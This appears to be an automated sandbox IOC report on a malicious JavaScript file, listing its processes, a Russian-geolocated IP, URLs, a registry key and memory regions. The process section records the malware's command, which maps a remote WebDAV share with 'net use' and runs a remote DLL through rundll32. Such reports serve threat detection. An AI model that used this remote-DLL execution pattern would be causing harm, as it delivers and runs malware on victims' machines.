IOC Report
10116429083634339.js

loading gif

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10116429083634339.js"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
malicious
C:\Windows\System32\net.exe
net use \\94.159.113.82@8888\davwwwroot\
malicious
C:\Windows\System32\rundll32.exe
rundll32 \\94.159.113.82@8888\davwwwroot\47861995729186.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://94.159.113.82:8888/
unknown
http://94.159.113.82:8888/r
unknown

IPs

IP
Domain
Country
Malicious
94.159.113.82
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
275080A0000
remote allocation
page read and write
2AF6741B000
heap
page read and write
2AF67436000
heap
page read and write
2AF67440000
heap
page read and write
2AF6740C000
heap
page read and write
2A47FD53000
heap
page read and write
275080A0000
remote allocation
page read and write
2A47DBDF000
heap
page read and write
2AF66F80000
heap
page read and write
2AF65514000
heap
page read and write
2AF67436000
heap
page read and write
2AF673E5000
heap
page read and write
2AF67438000
heap
page read and write
2AF67421000
heap
page read and write
2A47FD50000
heap
page read and write
27507EAF000
heap
page read and write
27507EB6000
heap
page read and write
2AF67436000
heap
page read and write
2AF673CA000
heap
page read and write
D94C0FC000
stack
page read and write
2A47DBE9000
heap
page read and write
2AF65514000
heap
page read and write
2AF67420000
heap
page read and write
2A47F710000
heap
page read and write
2AF654F3000
heap
page read and write
E8F82FF000
stack
page read and write
D94BD5B000
stack
page read and write
2AF673F0000
heap
page read and write
27507E96000
heap
page read and write
2AF67440000
heap
page read and write
2AF67448000
heap
page read and write
2A47FD30000
heap
page read and write
E8F86FB000
stack
page read and write
2AF65514000
heap
page read and write
2AF654EA000
heap
page read and write
2AF6740C000
heap
page read and write
2AF656BA000
heap
page read and write
27507E6D000
heap
page read and write
2AF6744B000
heap
page read and write
2AF67419000
heap
page read and write
2AF673D1000
heap
page read and write
2AF67CF5000
heap
page read and write
2AF673D4000
heap
page read and write
2AF673DA000
heap
page read and write
2AF67429000
heap
page read and write
27507EB6000
heap
page read and write
2AF654F9000
heap
page read and write
2AF65490000
heap
page read and write
2AF673EF000
heap
page read and write
2AF673CB000
heap
page read and write
2AF673EB000
heap
page read and write
27508050000
heap
page read and write
2AF6742C000
heap
page read and write
2AF67440000
heap
page read and write
2AF673EE000
heap
page read and write
2A47DBC8000
heap
page read and write
2A47DBD9000
heap
page read and write
27507E79000
heap
page read and write
2A47DBD9000
heap
page read and write
2AF6740C000
heap
page read and write
2AF674E7000
heap
page read and write
2AF673C7000
heap
page read and write
2AF6740C000
heap
page read and write
2AF673DA000
heap
page read and write
2AF67436000
heap
page read and write
2AF67408000
heap
page read and write
E8F7FFE000
stack
page read and write
2AF656BC000
heap
page read and write
2AF673F3000
heap
page read and write
2AF67442000
heap
page read and write
2AF67436000
heap
page read and write
2AF673DA000
heap
page read and write
2AF673D5000
heap
page read and write
E8F83FE000
stack
page read and write
2AF67420000
heap
page read and write
2AF65680000
heap
page read and write
2AF67730000
heap
page read and write
2AF6740C000
heap
page read and write
2A47DBD6000
heap
page read and write
2AF654E8000
heap
page read and write
2AF673D3000
heap
page read and write
2AF673EE000
heap
page read and write
27507EA9000
heap
page read and write
2AF673D7000
heap
page read and write
2AF67440000
heap
page read and write
2AF654FA000
heap
page read and write
2AF6740C000
heap
page read and write
2AF67435000
heap
page read and write
2AF67443000
heap
page read and write
D94BDDF000
stack
page read and write
27507E6D000
heap
page read and write
2AF673EE000
heap
page read and write
2AF654B8000
heap
page read and write
2AF673F5000
heap
page read and write
2A47DBC0000
heap
page read and write
27507E9E000
heap
page read and write
2AF673C4000
heap
page read and write
2AF67413000
heap
page read and write
2A47DBEE000
heap
page read and write
2AF673CF000
heap
page read and write
2A47DE2B000
heap
page read and write
275081D5000
heap
page read and write
2AF67405000
heap
page read and write
2A47DBEA000
heap
page read and write
2AF673EA000
heap
page read and write
2AF6740A000
heap
page read and write
2AF6740C000
heap
page read and write
27507E96000
heap
page read and write
27507E7C000
heap
page read and write
2A47DCC0000
heap
page read and write
2A47DC07000
heap
page read and write
2AF673ED000
heap
page read and write
E8F7DFF000
stack
page read and write
2AF673FD000
heap
page read and write
2AF656BE000
heap
page read and write
2AF673F0000
heap
page read and write
27507EA3000
heap
page read and write
2AF673D9000
heap
page read and write
2AF6740C000
heap
page read and write
27507E79000
heap
page read and write
2AF656BC000
heap
page read and write
2A47DBE3000
heap
page read and write
2AF656BC000
heap
page read and write
2AF6742C000
heap
page read and write
E5BACFF000
stack
page read and write
2A47DDA0000
heap
page read and write
E5BA98A000
stack
page read and write
2AF656BA000
heap
page read and write
2AF673C0000
heap
page read and write
2AF67440000
heap
page read and write
2A47DBE2000
heap
page read and write
2A47DBF9000
heap
page read and write
27507E75000
heap
page read and write
2A47DBE2000
heap
page read and write
2AF673DA000
heap
page read and write
E8F81FE000
stack
page read and write
2AF67411000
heap
page read and write
2A47DBE9000
heap
page read and write
2AF673C2000
heap
page read and write
2AF6740C000
heap
page read and write
2A47DBDD000
heap
page read and write
2A4015A0000
trusted library allocation
page read and write
27508030000
heap
page read and write
27507EA9000
heap
page read and write
2AF673FB000
heap
page read and write
2A47DBE3000
heap
page read and write
2AF673DA000
heap
page read and write
2AF656B0000
heap
page read and write
2AF67436000
heap
page read and write
27507E48000
heap
page read and write
2AF6740B000
heap
page read and write
2A47DE25000
heap
page read and write
27507F50000
heap
page read and write
27507EA9000
heap
page read and write
2AF67427000
heap
page read and write
2AF65540000
heap
page read and write
2AF656BB000
heap
page read and write
2A47DBF3000
heap
page read and write
2AF67ABF000
heap
page read and write
2AF673CC000
heap
page read and write
2AF673DA000
heap
page read and write
2AF673E1000
heap
page read and write
2AF67440000
heap
page read and write
2AF673DD000
heap
page read and write
2AF673EE000
heap
page read and write
2AF67408000
heap
page read and write
2AF654FE000
heap
page read and write
2AF654B9000
heap
page read and write
E5BAC7F000
stack
page read and write
27507EAF000
heap
page read and write
2AF673C2000
heap
page read and write
2AF67439000
heap
page read and write
2AF673C6000
heap
page read and write
2A47DBE2000
heap
page read and write
2AF673D4000
heap
page read and write
2AF673DF000
heap
page read and write
2AF673DA000
heap
page read and write
2AF67436000
heap
page read and write
2AF673E3000
heap
page read and write
2A47DE20000
heap
page read and write
2AF673C1000
heap
page read and write
2AF6740C000
heap
page read and write
2AF673CE000
heap
page read and write
275080A0000
remote allocation
page read and write
2AF6798B000
heap
page read and write
2AF67403000
heap
page read and write
2AF673DB000
heap
page read and write
2AF6773E000
heap
page read and write
2A47DDC0000
heap
page read and write
2AF67433000
heap
page read and write
275081D0000
heap
page read and write
27507E9C000
heap
page read and write
2AF673C7000
heap
page read and write
E8F79D9000
stack
page read and write
27507EB6000
heap
page read and write
D94C17E000
stack
page read and write
27507E40000
heap
page read and write
2AF673CB000
heap
page read and write
27507EA2000
heap
page read and write
2A47DBF9000
heap
page read and write
2AF654F0000
heap
page read and write
2AF673C3000
heap
page read and write
2AF67437000
heap
page read and write
2AF6786B000
heap
page read and write
2AF67436000
heap
page read and write
2AF6740C000
heap
page read and write
E8F7CFD000
stack
page read and write
2AF656C0000
heap
page read and write
2A47DBFF000
heap
page read and write
2A47DBE2000
heap
page read and write
2AF656B5000
heap
page read and write
2AF654FC000
heap
page read and write
D94C07F000
stack
page read and write
2AF6740C000
heap
page read and write
2AF67436000
heap
page read and write
2AF655A0000
heap
page read and write
E8F80FE000
stack
page read and write
E8F84FD000
stack
page read and write
27507EAF000
heap
page read and write
There are 209 hidden memdumps, click here to show them.